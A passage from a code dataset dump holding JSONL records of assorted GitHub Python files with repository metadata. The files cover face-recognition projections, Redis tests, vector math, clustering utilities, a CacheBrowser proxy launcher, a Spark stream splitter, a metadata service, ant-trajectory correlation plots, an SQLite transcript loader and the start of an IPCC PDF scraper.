1))\n test_all_imgs = np.concatenate([test_all_imgs, temp], axis=1)\n\n# Step 1 에서 추출해서 저장해두었던 truncated U matrix로\n# 각 reconstructed 된 이미지와 테스트 이미지를 porjection한다.\nface_proj = truncU.T @ reconstruct\ntest_proj = truncU.T @ test_all_imgs\n\n\ndef similarity_between_faces(face_t, face2_r):\n \"\"\"\n 두 이미지의 번호를 인자로 받아 Euclidean Distance를 반환한다.\n \"\"\"\n face_t -= 1\n face2_r -= 1\n\n face_diff = test_proj[:, face_t] - face_proj[:, face2_r]\n\n return np.linalg.norm(face_diff)\n\n\ndef find_most_similar(face):\n \"\"\"\n 테스트 이미지의 번호를 입력으로 받아서 가장 비슷한 이미지 번호를 반환한다.\n \"\"\"\n distances = []\n for face_n in range(39):\n sim = similarity_between_faces(face, face_n)\n distances.append(sim)\n\n best_score = min(distances) # 가장 낮은 점수 = 가장 가까운 거리 = 가장 비슷한 이미지\n best_face_num = distances.index(min(distances))\n\n return best_face_num\n\n\nfor a in range(1, 6):\n found = find_most_similar(a)\n\n if found >= 10:\n f.write(f\"\\ntest0{a}.pgm ==> face{found}.pgm\")\n else:\n f.write(f\"\\ntest0{a}.pgm ==> face0{found}.pgm\")\n\nf.close()\n","repo_name":"thxxx/computerVision","sub_path":"Project2/2017147505.py","file_name":"2017147505.py","file_ext":"py","file_size_in_byte":5047,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28155023111","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport unittest\nimport json\n\nfrom redis import StrictRedis\n\nfrom mining.db import DataWarehouse\n\n\nclass connecion_via_drive_test(unittest.TestCase):\n def test_connection(self):\n DW = DataWarehouse()\n self.assertTrue(isinstance(DW.conn(), StrictRedis))\n\n\nclass save_via_drive_test(unittest.TestCase):\n def test_save_application_json(self):\n DW = DataWarehouse()\n DW.save('test_1', {\"id\": 1, \"name\": \"Open Mining\"})\n r = StrictRedis()\n self.assertEquals(r.get('test_1'), '{\"id\": 1, \"name\": \"Open Mining\"}')\n\n def test_save_text(self):\n DW = DataWarehouse()\n DW.save('test_2', \"Open Mining\", content_type='application/text')\n r = StrictRedis()\n self.assertEquals(r.get('test_2'), \"Open Mining\")\n\n\nclass get_via_drive_test(unittest.TestCase):\n def test_get_application_json(self):\n r = StrictRedis()\n data = {\"id\": 1, \"name\": \"Open Mining\"}\n r.set('test_get_1', json.dumps(data))\n DW = DataWarehouse()\n self.assertEquals(DW.get(\"test_get_1\"), data)\n\n def test_get_text(self):\n r = StrictRedis()\n r.set('test_get_2', \"Open Mining\")\n DW = DataWarehouse()\n self.assertEquals(\n DW.get(\"test_get_2\", content_type='application/text'),\n \"Open Mining\")\n","repo_name":"mining/mining","sub_path":"mining/test/test_db_redis_datawarehouse.py","file_name":"test_db_redis_datawarehouse.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":1200,"dataset":"github-code","pt":"40"} +{"seq_id":"9908742290","text":"\"\"\"\r\nAssignment 6 - Question 2\r\nProgram to perform baisic vector calculation in 3 dimensions\r\nJayan Smart\r\nApril 2014\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\n\r\ndef vec_add(vec_A, vec_B):#Compute Addition:\r\n x_sum = vec_A[0] + vec_B[0]\r\n y_sum = vec_A[1] + vec_B[1]\r\n z_sum = vec_A[2] + vec_B[2] \r\n vec_AplusB = [x_sum, y_sum, z_sum]\r\n\r\n print(\"A+B =\", vec_AplusB)\r\n\r\ndef vec_dot(vec_A, vec_B):#Compute Dot-Product:\r\n x_dot = vec_A[0] * vec_B[0]\r\n y_dot = vec_A[1] * vec_B[1]\r\n z_dot = vec_A[2] * vec_B[2] \r\n vec_AdotB = (x_dot + y_dot + z_dot)\r\n\r\n print(\"A.B =\", vec_AdotB)\r\n\r\ndef norm_A(vec_A): #Compute Norm A:\r\n norm_A = sqrt((vec_A[0])**2 + (vec_A[1])**2 + (vec_A[2])**2)\r\n\r\n print (\"|A| =\", \"{:.2f}\".format(norm_A)) \r\n\r\ndef norm_B(vec_B):#Compute Norm B:\r\n norm_B = sqrt((vec_B[0])**2 + (vec_B[1])**2 + (vec_B[2])**2)\r\n\r\n print (\"|B| =\", \"{:.2f}\".format(norm_B))\r\n\r\n \r\ndef main():\r\n #Recieve imput of vectors A and B:\r\n vec_A = input(\"Enter vector A:\\n\")\r\n vec_A = vec_A.split()\r\n for i in range(len(vec_A)):\r\n vec_A[i] = eval(vec_A[i])\r\n\r\n vec_B = input(\"Enter vector B:\\n\")\r\n vec_B = vec_B.split()\r\n for i in range(len(vec_B)):\r\n vec_B[i] = eval(vec_B[i])\r\n\r\n vec_add(vec_A, vec_B) #Compute Addition:\r\n vec_dot(vec_A, vec_B) #Compute Dot-Product:\r\n norm_A(vec_A) #Compute Norm A:\r\n norm_B(vec_B) #Compute Norm B:\r\n\r\nmain()\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/smrjay001/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14182584767","text":"import pandas as pd\npd.options.display.max_columns = 999\nfrom sklearn.preprocessing import MinMaxScaler\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\n\ndef Count_prop(data):\n\n \"\"\"\n Works out proportion word appears based on total # of words in document\n \"\"\"\n\n # sum counts by doc index\n doc_counts = pd.DataFrame(data[\"count\"].groupby(data.doc_index).sum()).reset_index()\n data = pd.merge(data, doc_counts, how= \"left\", on=['doc_index'])\n data[\"count_prop\"] = data.count_x/data.count_y\n data = data.drop(['count_y'], axis=1)\n\n return data\n\ndef MinMax(data):\n\n \"\"\"\n Scales TFIDF so Criteria can be applied to select final keywords\n \"\"\"\n\n # Remove nulls & Shape Data\n data = data.fillna(0)\n tfidf = np.array(data[\"tfidf\"])\n tfidf = tfidf.reshape(-1,1)\n\n # Run scaler\n scaler = MinMaxScaler()\n tfidf = scaler.fit_transform(tfidf)\n data[\"scaled_tfidf\"] = tfidf\n\n return data\n\n\ndef cluster(cluster_type, n_clusters, sentence_embeddings, key_phrase = None, create_plot = 'Y'):\n\n if key_phrase == None:\n key_phrase = list(range(0,len(sentence_embeddings),1))\n\n # Run KMeans\n if cluster_type == 0:\n # CREATE CLUSTERS\n kmeans = KMeans(n_clusters= n_clusters)\n # fit kmeans object to data\n kmeans.fit(sentence_embeddings)\n # print location of clusters learned by kmeans object\n # print(kmeans.cluster_centers_)\n # save new clusters for chart\n y_km = kmeans.fit_predict(sentence_embeddings)\n\n # Run Hierarchical Clustering\n if cluster_type == 1:\n from sklearn.cluster import AgglomerativeClustering\n cluster = AgglomerativeClustering(n_clusters=n_clusters, affinity='euclidean', linkage='ward')\n y_km = cluster.fit_predict(sentence_embeddings)\n\n se_array = np.array(sentence_embeddings)\n\n # CREATE PLOT\n fulldf=pd.DataFrame()\n for i in range(0, n_clusters):\n # print(i)\n if create_plot == 'Y':\n plt.scatter(se_array[y_km ==i,0][0], se_array[y_km == i,1][0], s=100)\n tempdf = pd.DataFrame(np.array(key_phrase)[[y_km == i,0][0]])\n tempdf.columns=['phrase']\n tempdf['cluster_name']=i\n fulldf = fulldf.append(tempdf)\n if create_plot == 'Y':\n plt.legend(range(0 , n_clusters), loc='center left', bbox_to_anchor=(1, 0.5))\n\n return fulldf\n","repo_name":"katiestuart/Keyword_Extraction","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35453135768","text":"from __future__ import unicode_literals\n\nimport numpy as np\n\n\ndef sample_linear_density(nsamp, x0, w, y0, y1):\n '''\n Input:\n nsamp - number of samples\n x0 - left boundary\n w - interval length\n y0 - density at left boundary\n y1 - density at right boundary\n '''\n m = y0\n k = y1-y0\n u = np.random.rand(nsamp)\n if k != 0:\n q = m/k\n return (-q + np.sign(q)*np.sqrt(q**2+(1+2*q)*u))*w + x0\n return u*w + x0\n\n\ndef evenly_spaced_linear_density(nsamp, x0, w, y0, y1):\n '''\n Input:\n nsamp - number of samples\n x0 - left boundary\n w - interval length\n y0 - density at left boundary\n y1 - density at right boundary\n '''\n m = y0\n k = y1-y0\n u = np.linspace(0, 1, nsamp, endpoint=False)\n if k != 0:\n q = m/k\n return (-q + np.sign(q)*np.sqrt(q**2+(1+2*q)*u))*w + x0\n return u*w + x0\n\n\ndef fp_blurring(data, w, even_spaced=False):\n '''\n Blurs data using the frequency polygon. Data is assumed to\n be binned with bin width w. Purpose of blurring is to counter\n effect of truncation. When even_spaced is True, the blurred data\n is put in a deterministic way according to the density, when\n False it is sampled from the density.\n\n Ref: Minnotte (1997): Nonparametric Testing of Existence of Modes.\n\n Input:\n data - data set (one-dimensional)\n w - bin width\n\n '''\n y, x = np.histogram(data, bins=np.arange(min(data)-0.5*w, max(data)+1.5*w, w))\n y_count = np.hstack([[0], y, [0]])\n x_fp = np.zeros(2*len(x)-1)\n x_fp[0::2] = x\n x_fp[1::2] = (x[1:]+x[:-1])/2\n y_fp = np.zeros(2*len(x)-1)\n y_fp[1::2] = y\n y_fp[::2] = (y_count[1:]+y_count[:-1])*1./2\n\n n_fp = np.zeros(2*len(y), dtype=np.int)\n p_left = (y_count[:-2] + 3*y_count[1:-1])*1./(y_count[:-2] + 6*y_count[1:-1] + y_count[2:])\n p_left[np.isnan(p_left)] = 0\n if not even_spaced:\n n_fp[0::2] = np.random.binomial(y, p_left)\n else:\n n_fp[0::2] = np.round(y*p_left)\n n_fp[1::2] = y - n_fp[0::2]\n data_fp = []\n for n, x0, y0, y1 in zip(n_fp, x_fp[:-1], y_fp[:-1], y_fp[1:]):\n if not even_spaced:\n data_fp.append(sample_linear_density(n, x0, w*0.5, y0, y1))\n else:\n data_fp.append(evenly_spaced_linear_density(n, x0, w*0.5, y0, y1))\n data_blurred = data.copy().astype(np.float)\n for i, (x0, x1) in enumerate(zip(x[:-1], x[1:])):\n ind = (data >= x0)*(data < x1)\n if len(ind) > 0:\n data_blurred[ind] = np.hstack(data_fp[(2*i):(2*i+2)])\n return data_blurred\n","repo_name":"kjohnsson/modality","sub_path":"modality/util/frequency_polygon_blurring.py","file_name":"frequency_polygon_blurring.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"21467785419","text":"\n\nimport numbers\nERROR_MESSAGES = [\"argument count error\", \"argument type error\"]\n\n\ndef row_summ(*args):\n if(len(args) != 1):\n print(\"проверьте правильность введенный данных - неверное количество аргументов!\")\n return ERROR_MESSAGES[0]\n if(not isinstance(args[0], numbers.Number)):\n print(\"проверьте правильность введенный данных - аргумент не является числом\")\n return ERROR_MESSAGES[1]\n row_counter = args[0]\n if((row_counter % 1) != 0):\n print(\"проверьте правильность введенных аргументов - аргумент не является целым числом\")\n return ERROR_MESSAGES[1]\n rt_value = 0\n for n in range(row_counter):\n rt_value += (2*n+1)\n print(F\"результат выполнения функции - {rt_value}\")\n return rt_value\n","repo_name":"pohaha/programming_technologies_4_semester","sub_path":"LABORATORIES/pt_lab_3/LAB3_VAR6.py","file_name":"LAB3_VAR6.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"758578171","text":"from cachebrowser.network import ServerRack\nfrom settings import settings\nfrom daemon import Daemon\nfrom gevent import monkey\nimport argparse\nimport logging\nimport sys\nimport gevent\nimport cli\nimport proxy\n\nimport api\nimport models\nimport http\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"CacheBrowser\")\n parser.add_argument('-d', '-daemon', action='store_true', dest='daemon', help=\"run in daemon mode\")\n parser.add_argument('-s', '-socket', dest='socket', help=\"cachebrowser socket\")\n parser.add_argument('command', nargs='*', default=None, help='A cachebrowser command to execute and exit')\n args = parser.parse_args()\n settings.update_from_args(vars(args))\n\n\ndef init_logging():\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(message)s')\n ch.setFormatter(formatter)\n root.addHandler(ch)\n\n\ndef run_cachebrowser():\n logging.info(\"Cachebrowser running...\")\n logging.debug(\"Waiting for connections...\")\n\n monkey.patch_all()\n\n rack = ServerRack()\n rack.add_server(port=5100, handler=cli.CLIHandler)\n rack.add_server(port=5200, handler=api.APIHandler)\n rack.add_server(port=8080, handler=proxy.ProxyConnection)\n rack.add_server(port=9000, handler=http.HttpConnection)\n # looper.register_server(port=5002, handler=proxy.handle_connection)\n # looper.register_server(port=9000, handler=http.handle_connection)\n # looper.start()\n\n rack.start_all()\n\n gevent.wait()\n\n\ndef run_command(command):\n class InlineCLIHandler(cli.CLIHandler):\n def __init__(self):\n super(InlineCLIHandler, self).__init__(None)\n self.send = sys.stdout.write\n\n handler = InlineCLIHandler()\n handler.handle_command(*command)\n\n\ndef main():\n parse_arguments()\n init_logging()\n models.initialize_database(settings['database'])\n\n command = settings.get('command', None)\n if command:\n run_command(command)\n return\n\n if settings.get('daemon', False):\n daemon = Daemon('/tmp/cachebrowser.pid', run_cachebrowser)\n daemon.start()\n else:\n run_cachebrowser()\n\nif __name__ == '__main__':\n main()","repo_name":"hjmj/cachebrowser","sub_path":"cachebrowser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"30871008514","text":"import sqlite3\nimport os\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n\n# The file directory to put the database in\nFILE_DIR = '/Users/nasif/Desktop/Mine/Workspace/vs_workspace/IGF-Data-Mining/'\n# The global variable that says the script which year of transcripts to add to the database\nTRANSCRIPT_YEAR = 2012\n# The global indexes that needs to be changed to reflect the current transcript year\n# Lets the script know where the transcript only links start and end.\nBEGIN_URL = 'http://www.intgovforum.org/cms/IGF-OpeningSession-301006.txt'\nEND_URL = 'http://www.intgovforum.org/cms/IGF-Closing%20Ceremony.txt'\n\n# Connect to the database and initialize the cursor\nconnection = sqlite3.connect(FILE_DIR + \"TranscriptsIGF.db\")\ncursor = connection.cursor()\n\n# Create the TABLE for the database and commit the changes\nsql_command = \"\"\"CREATE TABLE IF NOT EXISTS Transcripts (\n Year INTEGER,\n Panel_Name TEXT,\n Content TEXT,\n URL TEXT,\n Date_Accessed TEXT\n);\"\"\"\ncursor.execute (sql_command)\nconnection.commit()\n\n# send a GET request, pose as a Mozilla Firefox agent\nurl = 'http://www.intgovforum.org/multilingual/content/first-igf-meeting-athens-greece'\nheaders={'User-Agent': 'Mozilla/5.0'}\nr = requests.get(url, headers=headers)\nprint (url)\nprint (headers)\nprint (\"Getting the urls for transcripts of the year \" + str(TRANSCRIPT_YEAR) + \"...\")\nhtml = r.text\n\n# convert html into BS object\nsoup = BeautifulSoup(html, 'html.parser')\nhrefs = soup.find_all('a')\n\n# get all the links from the main page into a list\nurl_list = []\nurl_first_half = '' # http://www.intgovforum.org\nfor link in hrefs: \n\turl_second_half = link.get('href')\n\turl_list.append(url_first_half + str(url_second_half))\n\n# Select links that are transcript related and discard all the others\nbegin = url_first_half + BEGIN_URL\nend = url_first_half + END_URL\nbegin_index = url_list.index(begin)\nend_index = url_list.index(end)\nurl_list = url_list[begin_index : end_index + 1] # List now only has transcript urls\n\nprint (\"Fetched all the URLs successfully.\")\nprint (\"Starting to add everything to the database.\")\n\n# Gather all the appropriate column information from the transcript file directory to add to the database\nlist_of_files = os.listdir(FILE_DIR + \"/Transcripts_\" + str(TRANSCRIPT_YEAR))\n\nprint (\"Number of transcripts in folder \" + str(len(list_of_files)))\n\n# Index for the url_list\nindex = 0\nfor file in list_of_files:\n # Add the name of the file to be used as the name_of_panel later when it gets added to the database\n panel_name = file\n # Find the file in the directory so that it can be read\n input = FILE_DIR + \"/Transcripts_\" + str(TRANSCRIPT_YEAR) + \"/\" + file\n file_content = open(input, \"r\").read().replace(\"\\\\\", \"\") # Replace all the backslashes in the file\n # Get the url of the current transcript file\n file_url = url_list[index]\n index = index + 1\n # Find the last accessed (data modified) of the transcript file\n epoch = os.path.getmtime(input)\n # Convert epoch time (which is in seconds) into date and time\n date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(epoch))\n # Add the values into appropriate columns in the database\n cursor.execute(\"INSERT INTO Transcripts VALUES (?, ?, ?, ?, ?)\", (TRANSCRIPT_YEAR, panel_name, file_content, file_url, date))\n connection.commit() # Commit the changes\n print(\"Added \" + file + \" to the database\")\nprint(\"Successfully added everything to the database!\")\nconnection.close()","repo_name":"Nasiff/IGF-Data-Mining","sub_path":"sqldatabase.py","file_name":"sqldatabase.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3578446142","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType\n\nspark = SparkSession.builder.appName(\"EventsSplit\").getOrCreate()\n\nuserSchema = StructType().add(\"timestamp\", \"string\").add(\"visitorid\", \"string\").add(\"event\", \"string\").add(\"itemid\", \"string\").add(\"transactionid\", \"string\")\n\n\ndfCSV = spark.readStream.option(\"sep\", \",\").option(\"header\", \"false\").schema(userSchema).csv(\"file:///C:/tmp/text\")\n\ndfCSV.createOrReplaceTempView(\"events\")\n\ntransaction = spark.sql(\"select * from events where event='transaction'\")\nevents = spark.sql(\"select * from events where event<>'transaction'\")\n\nquery1 = transaction.writeStream.format(\"console\").start()\nquery2 = events.writeStream.format(\"console\").start()\n\nquery1.awaitTermination()\nquery2.awaitTermination()\n\n\n\n\n","repo_name":"Sherif-Embarak/Re-Vision","sub_path":"ETL_events_spark.py","file_name":"ETL_events_spark.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41632964226","text":"from typing import List, Optional\n\nfrom watchmen_meta.common import TupleService, TupleShaper\nfrom watchmen_model.admin import Space\nfrom watchmen_model.admin.space import SpaceFilter\nfrom watchmen_model.common import DataPage, Pageable, SpaceId, TenantId\nfrom watchmen_storage import ColumnNameLiteral, EntityCriteriaExpression, EntityCriteriaJoint, \\\n\tEntityCriteriaJointConjunction, EntityCriteriaOperator, EntityRow, EntityShaper\nfrom watchmen_utilities import ArrayHelper, is_not_blank\n\n\nclass SpaceShaper(EntityShaper):\n\t@staticmethod\n\tdef serialize_filter(space_filter: SpaceFilter) -> dict:\n\t\tif isinstance(space_filter, dict):\n\t\t\treturn space_filter\n\t\telse:\n\t\t\treturn space_filter.dict()\n\n\t@staticmethod\n\tdef serialize_filters(filters: Optional[List[SpaceFilter]]) -> Optional[list]:\n\t\tif filters is None:\n\t\t\treturn None\n\t\treturn ArrayHelper(filters).map(lambda x: SpaceShaper.serialize_filter(x)).to_list()\n\n\tdef serialize(self, space: Space) -> EntityRow:\n\t\treturn TupleShaper.serialize_tenant_based(space, {\n\t\t\t'space_id': space.spaceId,\n\t\t\t'name': space.name,\n\t\t\t'description': space.description,\n\t\t\t'topic_ids': space.topicIds,\n\t\t\t'group_ids': space.groupIds,\n\t\t\t'filters': SpaceShaper.serialize_filters(space.filters),\n\t\t})\n\n\tdef deserialize(self, row: EntityRow) -> Space:\n\t\t# noinspection PyTypeChecker\n\t\treturn TupleShaper.deserialize_tenant_based(row, Space(\n\t\t\tspaceId=row.get('space_id'),\n\t\t\tname=row.get('name'),\n\t\t\tdescription=row.get('description'),\n\t\t\ttopicIds=row.get('topic_ids'),\n\t\t\tgroupIds=row.get('group_ids'),\n\t\t\tfilters=row.get('filters')\n\t\t))\n\n\nSPACE_ENTITY_NAME = 'spaces'\nSPACE_ENTITY_SHAPER = SpaceShaper()\n\n\nclass SpaceService(TupleService):\n\tdef should_record_operation(self) -> bool:\n\t\treturn True\n\n\tdef get_entity_name(self) -> str:\n\t\treturn SPACE_ENTITY_NAME\n\n\tdef get_entity_shaper(self) -> EntityShaper:\n\t\treturn SPACE_ENTITY_SHAPER\n\n\tdef get_storable_id(self, storable: Space) -> SpaceId:\n\t\treturn storable.spaceId\n\n\tdef set_storable_id(self, storable: Space, storable_id: SpaceId) -> Space:\n\t\tstorable.spaceId = storable_id\n\t\treturn storable\n\n\tdef get_storable_id_column_name(self) -> str:\n\t\treturn 'space_id'\n\n\t# noinspection DuplicatedCode\n\tdef find_page_by_text(self, text: Optional[str], tenant_id: Optional[TenantId], pageable: Pageable) -> DataPage:\n\t\tcriteria = []\n\t\tif text is not None and len(text.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaJoint(\n\t\t\t\tconjunction=EntityCriteriaJointConjunction.OR,\n\t\t\t\tchildren=[\n\t\t\t\t\tEntityCriteriaExpression(\n\t\t\t\t\t\tleft=ColumnNameLiteral(columnName='name'), operator=EntityCriteriaOperator.LIKE, right=text),\n\t\t\t\t\tEntityCriteriaExpression(\n\t\t\t\t\t\tleft=ColumnNameLiteral(columnName='description'), operator=EntityCriteriaOperator.LIKE,\n\t\t\t\t\t\tright=text)\n\t\t\t\t]\n\t\t\t))\n\t\tif tenant_id is not None and len(tenant_id.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaExpression(left=ColumnNameLiteral(columnName='tenant_id'), right=tenant_id))\n\t\treturn self.storage.page(self.get_entity_pager(criteria=criteria, pageable=pageable))\n\n\t# noinspection DuplicatedCode\n\tdef find_by_name(self, text: Optional[str], tenant_id: Optional[TenantId]) -> List[Space]:\n\t\tcriteria = []\n\t\tif is_not_blank(text):\n\t\t\tcriteria.append(EntityCriteriaExpression(\n\t\t\t\tleft=ColumnNameLiteral(columnName='name'), operator=EntityCriteriaOperator.LIKE, right=text.strip()))\n\t\tif tenant_id is not None and len(tenant_id.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaExpression(left=ColumnNameLiteral(columnName='tenant_id'), right=tenant_id))\n\t\t# noinspection PyTypeChecker\n\t\treturn self.storage.find(self.get_entity_finder(criteria=criteria))\n\n\tdef find_by_ids(self, space_ids: List[SpaceId], tenant_id: Optional[TenantId]) -> List[Space]:\n\t\tcriteria = [\n\t\t\tEntityCriteriaExpression(\n\t\t\t\tleft=ColumnNameLiteral(columnName='space_id'), operator=EntityCriteriaOperator.IN, right=space_ids)\n\t\t]\n\t\tif tenant_id is not None and len(tenant_id.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaExpression(left=ColumnNameLiteral(columnName='tenant_id'), right=tenant_id))\n\t\t# noinspection PyTypeChecker\n\t\treturn self.storage.find(self.get_entity_finder(criteria))\n\n\t# noinspection DuplicatedCode\n\tdef find_all(self, tenant_id: Optional[TenantId]) -> List[Space]:\n\t\tcriteria = []\n\t\tif tenant_id is not None and len(tenant_id.strip()) != 0:\n\t\t\tcriteria.append(EntityCriteriaExpression(left=ColumnNameLiteral(columnName='tenant_id'), right=tenant_id))\n\t\t# noinspection PyTypeChecker\n\t\treturn self.storage.find(self.get_entity_finder(criteria=criteria))\n","repo_name":"Indexical-Metrics-Measure-Advisory/watchmen","sub_path":"packages/watchmen-meta/src/watchmen_meta/admin/space_service.py","file_name":"space_service.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"37929816082","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\n#with open('LastResult/AntPhase-1.txt') as f:\n# a = np.loadtxt(f, delimiter=';', usecols=(0,1,2), unpack=True)\n#\n#plt.plot(a[0],a[1], 'o',label='ok')\n#plt.plot(a[0],a[2], 'o',label='ok')\n#plt.show()\n\n\n\n#mesma coisa:\nwith open('LastResult/AntPhase-1.txt') as f:\n x,y = np.loadtxt(f, delimiter=';', usecols=(0,2), unpack=True)\n\n#plt.plot(x,y, 'ro',label='ok')\n#plt.show()\n\n#plt.plot([1,2,3,4],'ro')\n#plt.ylabel('some numbers')\n#plt.show()\n\n\ndef mean(numbers):\n return float(sum(numbers)) / max(len(numbers), 1)\n\n\ndef StartsAtI(a,I):\n result = []\n for i in range(len(a)):\n result.append(a[(i+I)%len(a)])\n return result\n\ndef InnerProd(a,b):\n sum = 0\n for i in range(len(a)):\n sum += a[i]*b[i]\n return sum\n\ndef Norm(a):\n return np.sqrt(InnerProd(a,a))\n\ndef Shorten(a,n):\n return [a[n*i] for i in range(int(len(a)/n))]\n\n\n\ndef correlation(x,y):\n# print(x)\n# print(y)\n\n result = []\n part1 = 0.\n part2 = 0.\n part3 = 0.\n mx = mean(x)\n my = mean(y)\n print('Computing correlation...')\n xmx = [k-mx for k in x]\n \n for i in range(1*len(x)):\n \n ymy = [k-my for k in StartsAtI(y,i)]\n \n result+=[InnerProd(xmx,ymy) / (Norm(xmx)*Norm(ymy))]\n\n return result\n\n\n\na=[1,2,10,3]\nb=[1,2,10,3]\n\n\na=range(20)\nb=StartsAtI(a,0)\n\n#print(a)\n#print(StartsAtI(a,0))\n#print(StartsAtI(a,1))\n#print(StartsAtI(a,2))\n#print(StartsAtI(a,3))\n#print(StartsAtI(a,18))\n\n\n\ncc = correlation(a,b)\n#print(correlation(a,b));\n#plt.plot(cc,'r')\n#plt.show()\n\n\nants = 10\nx=list(range(ants))\ny=list(range(ants))\n\ncoords = [posx, velx, posy, vely, angle] = [0,1,2,3,4]\n\n#dirname = 'LastResult'\ndirname = 'phero'\n\nfor i in range(ants):\n\n filename = dirname+'/AntPhase-'+str(i+1)+'.txt'\n with open(filename) as f:\n x[i],y[i] = np.loadtxt(f, delimiter=';', usecols=(posx,posy), unpack=True)\n# x[i] = np.loadtxt(f, delimiter=';', usecols=0, unpack=True)\n# y[i] = np.loadtxt(f, delimiter=';', usecols=1, unpack=True)\n\n#print(y[0])\n#print(x[0])\n#filename = 'LastResult/AntPhase-1.txt'\n#with open(filename) as f:\n# x1 = np.loadtxt(f, delimiter=';', usecols=(0,), unpack=True)\n#\n#filename = 'LastResult/AntPhase-2.txt'\n#with open(filename) as f:\n# x2 = np.loadtxt(f, delimiter=';', usecols=(0,), unpack=True)\n\n#cc=range(25)\n#cc=[0 for c in cc]\n#for i in range(5):\n# for j in range(5):\n\n#CorrPortraitx = list(range(ants))\n#CorrPortraity = list(range(ants))\n#CorrPortraitx, CorrPortraity = np.meshgrid(CorrPortraitx,CorrPortraity)\n#CorrPortraitz = 0. * CorrPortraitx # works bcause CorrPortraitx is now an array?...\n\n#floor = np.arange(ants*ants).reshape((ants,ants))\nfloor = np.array([[0.]*ants]*ants)\nCorrPortraitz = np.array([[0.]*ants]*ants)\nAnotherCorrPortraitz = np.array([[0.]*ants]*ants)\n\nfor i in range(len(CorrPortraitz)):\n CorrPortraitz[i][i]=1.\n AnotherCorrPortraitz[i][i]=1.\n\nnn = 10 # reduce size of list by nn for speed\nprint(range(ants))\nfor i in range(ants):\n for j in range(i+1,ants):\n print('(i,j) = (',i,',',j,')')\n xi = Shorten(x[i],nn)\n yi = Shorten(y[i],nn)\n xj = Shorten(x[j],nn)\n yj = Shorten(y[j],nn)\n cx = correlation(xi,xj)\n cy = correlation(yi,yj)\n maxcx = max(cx)\n maxcy = max(cy)\n CorrPortraitz[i][j] = maxcx*maxcy\n AnotherCorrPortraitz[i][j] = maxcy\n\nplt.figure(1)\nax = plt.subplot(121)\nplt.ylabel('maxcx*maxcy')\nax.imshow(CorrPortraitz)\n\nax = plt.subplot(122)\nplt.ylabel('only maxcy')\nax.imshow(AnotherCorrPortraitz)\n\nplt.show()\n\n\n#plt.show()\n\n\n\n\n","repo_name":"todisorder/AntsPython02","sub_path":"plot examples/AquiEstouATentarPlots.py","file_name":"AquiEstouATentarPlots.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13626265795","text":"import os\nfrom flask import Blueprint,request,jsonify\nfrom config import system as config\nfrom views import *\n#import views\n\nmod = Blueprint('alignment', __name__)\napp_dir = os.path.abspath(os.path.dirname(__file__))\n\n@mod.route('/mview_html/', methods = ['POST'])\ndef mview_html():\n\t\"get fmt,data,type and dump the viewer html\"\n\targ2def = {'fmt':'fasta','type':'dna'}\n\targs = {x:request.form.get(x,y) for x,y in arg2def.items()}\n\tif 'data' not in request.form:\n\t\treturn jsonify({'_msg':{'type':'error','des':'need args \"data\" in your submit'}})\n\telse:\n\t\targs['data']=request.form['data']\n\t\treturn jsonify({'html':mview().html_table(args)})\n","repo_name":"wyubin/dockers","sub_path":"nginx_flask_python2/uwsgi/project/python/app/alignment/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2693099804","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 13 15:12:09 2020\n\n@author: hjbec\n\"\"\"\n\n\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport urllib\n\n# connect to website and get list of all pdfs\nurl=\"https://www.ipcc.ch/reports/\"\nresponse = request.urlopen(url).read()\nsoup= BeautifulSoup(response, \"html.parser\") \nlinks = soup.find_all('a', href=re.compile(r'(.pdf)'))\n\n\n\n\n# clean the pdf link names\nurl_list = []\nfor el in links:\n if(el['href'].startswith('http')):\n url_list.append(el['href'])\n else:\n 